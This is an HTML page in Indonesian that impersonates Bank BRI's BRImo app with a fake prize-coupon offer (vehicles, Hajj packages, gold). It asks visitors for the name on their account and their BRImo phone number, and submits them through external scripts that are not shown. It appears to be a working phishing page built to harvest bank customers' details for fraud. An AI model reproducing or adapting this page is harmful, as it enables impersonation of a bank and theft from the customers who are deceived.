<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <title>PILIH KUPON 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮5</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta content="https://hosting.tigerengine.id/f8uyn1.jpg" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/f8uyn1.jpg">
    	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="img/1.css">
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: ;
      }
body {
    margin: 0px;
    background: url('img/buri.png'),#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
}

.lonte{
  display:none;
  z-index:3;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
      .jao{
            width:90%;
      }
</style>
<body>
    <main>
<welalxcome>
<img src="img/BRImo.png" alt="" style="margin-top: -50px" />
</welalxcome>
<chsalxcome2 style="display: none;">

<img style="position: fixed;width:100%;margin-top:50px;" src="img/26-.png" alt="">
<nav class="hh">
<img src="img/nav.png" style="margin-top:8px; margin-left:175px;" width="40px" alt="">
</nav>
<div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
      </div>
<marquee direction="right" behavior="alternate" scrolldelay="0" class="asu" style="display: block;animation: marquee 5000s linear infinite;overflow: hidden;">
<img class="nyusu" src="img/1.png" alt="">
<img class="nyusu" src="img/2.png" alt="">
<img class="nyusu" src="img/3.png" alt="">
<img class="nyusu" src="img/4.png" alt="">
<img class="nyusu" src="img/5.png" alt="">
</marquee>    



<form method="post" id="formHP">
<center><img style="position: fixed;width:20%;margin-top:610px;margin-left:-40px;" src="img/T24.png" alt=""></center>
<br>
<div class="button-85 hua">
<center style="color:#09559a; line-height: 20px; font-size: 15px; padding: 0px;margin-top:-12px;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:0px;height:50px;">Silahkan Pilih Salah Satu kupon  Di Bawah Ini</p>

</center>
<select name="tarif" required class="yantek" >
<option value="">PILIH KUPON</option>
<option value="KUPON MOBIL&SEPEDA MOTOR">√•KUPON MOBIL & SEPEDA MOTOR </option>
<option value="KUPON PAKET HAJI & UMROH">√•KUPON HAJI & UMROH </option>
<option value="KUPON PAKET HAJI & UMROH">√•KUPON EMAS LOGAM MULIA 5000</option>


</select>

<br><br><br>

<h5 style="position:absolute;color:#000; margin-top: -28px; margin-left: 4px">Atas Nama</h5>
<input id="nama" name="nama" type="text" class="kk" placeholder="Nama sesuai rekening" oninvalid="this.setCustomValidity('Mohon mɑsukkɑn Nama dengɑn benɑr')" onchange="this.setCustomValidity('')">
</h3>

<br><br><br>
<h5 style="position:absolute;color:#000; margin-top: -28px; margin-left: 4px">Masukan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>

<ion-icon name="phone-portrait-sharp">
</ion-icon>
<input id="NoHp" name="nohp" type="tel" class="kk" placeholder="08xxxxxx" oninvalid="this.setCustomValidity('Mohon mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗣𝗼𝗻𝘀𝗲𝗹 dengɑn benɑr')" onchange="this.setCustomValidity('')" required maxlength="13" minlength="10">
</h3>


<br>
<br>
</div>
    





<div class="kutal"><div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled>Lanjutkan</button>
           </div>
</smalxs>
</main>
</form>

<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script src="script.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },700)
        });
</script>
<script src="vibr.js"></script>
     <script src="req/1.js">
 </script>
<script src="img/1.js"></script>
</body>
</html>
